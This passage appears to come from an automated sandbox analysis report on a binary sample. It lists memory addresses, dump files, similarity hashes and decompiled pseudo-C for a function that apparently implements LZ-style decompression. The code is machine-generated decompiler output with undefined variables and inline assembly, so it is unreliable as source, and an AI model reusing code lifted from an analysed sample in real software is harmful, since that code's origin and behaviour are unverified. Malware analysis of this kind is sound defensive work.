          0x00205d90
          0x00205d92
          0x00205d92
          0x00205d96
          0x00205d9b
          0x00205d9e
          0x00205da1
          0x00205da4
          0x00205da7
          0x00205da7
          0x00205da7
          0x00205dac
          0x00205db0
          0x00000000
          0x00205db0
          0x00205d39
          0x00205d39
          0x00205d3c
          0x00000000
          0x00000000
          0x00205d3e
          0x00205d40
          0x00205d40
          0x00205d43
          0x00205d43
          0x00205d45
          0x00205d48
          0x00205d4e
          0x00205d54
          0x00205d5a
          0x00205d60
          0x00205d66
          0x00205d6c
          0x00205d6f
          0x00205d72
          0x00205d75
          0x00205d78
          0x00205d7b
          0x00205d7b
          0x00205d7b
          0x00000000
          0x00205cae
          0x00205cae
          0x00205cae
          0x00205cb7
          0x00205cb8
          0x00000000
          0x00205cb8
          0x00205cac
          0x00205b8a
          0x00205b8a
          0x00205bbd
          0x00205b8c
          0x00205b8f
          0x00205b98
          0x00205ba0
          0x00205ba3
          0x00205bab
          0x00205bb2
          0x00205bb8
          0x00205bb8
          0x00205bc2
          0x00205bc9
          0x00205bcf
          0x00205bd5
          0x00205bdc
          0x00205c08
          0x00205c0a
          0x00205c0b
          0x00205c0c
          0x00205c0e
          0x00205c2a
          0x00205c2d
          0x00205c34
          0x00205c37
          0x00205c3a
          0x00205c46
          0x00205c52
          0x00205c54
          0x00205c5a
          0x00205c5c
          0x00205c5c
          0x00205c5e
          0x00000000
          0x00205c5e
          0x00205c10
          0x00205c16
          0x00205c19
          0x00205c19
          0x00205c19
          0x00205c1b
          0x00000000
          0x00000000
          0x00205c1d
          0x00205c1d
          0x00205c1e
          0x00205c21
          0x00205c24
          0x00000000
          0x00000000
          0x00205c26
          0x00000000
          0x00205c26
          0x00205c28
          0x00205c28
          0x00000000
          0x00205bde
          0x00205bde
          0x00205be0
          0x00205be3
          0x00205bed
          0x00205bf5
          0x00205bfb
          0x00205bfe
          0x00205c66
          0x00205c69
          0x00205c69
          0x00205c6b
          0x00000000
          0x00205c6b
          0x00205bdc
          0x00205b7b
          0x00205ac9
          0x00205a1e
          0x00205a1e
          0x00205a25
          0x00205a43
          0x00205a49
          0x00205a4e
          0x00205a51
          0x00000000
          0x00205a51
          0x00205a27
          0x00205a34
          0x00205a3c
          0x00000000
          0x00205a3c
          0x0020598f
          0x00205935
          0x00205935
          0x00205937
          0x00000000
          0x00000000
          0x00205939
          0x0020593b
          0x00205940
          0x00205946
          0x0020594c
          0x00000000
          0x00000000
          0x00205952
          0x00205952
          0x00205966
          0x00205966
          0x0020596d
          0x00206261
          0x00206261
          0x00000000
          0x00206261
          0x00000000
          0x0020596d
          0x00205954
          0x00205954
          0x0020595a
          0x00205960
          0x00000000
          0x00000000
          0x00000000
          0x00205960
          0x002058a1

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
          • Instruction ID: 620a1a1bd9906c97bb6ce5120180b6f772e31bbd3b2bf2358b237f6fed62c3e6
          • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
          • Instruction Fuzzy Hash: BA622A71624B899FCB25CF34C8946BABBE1AF55304F04855EDCAA8B387D734E964CB10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00206CDB, Relevance: .8, Instructions: 773COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 98%
          			E00206CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E001FA4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E001FA4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E001FA4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E0020EA80(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E0020EA80(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00203564(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00201A0E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E001FA4ED(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E001FA4ED(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E0020EA80(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00207D76(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00207D76(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E001FA4ED(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
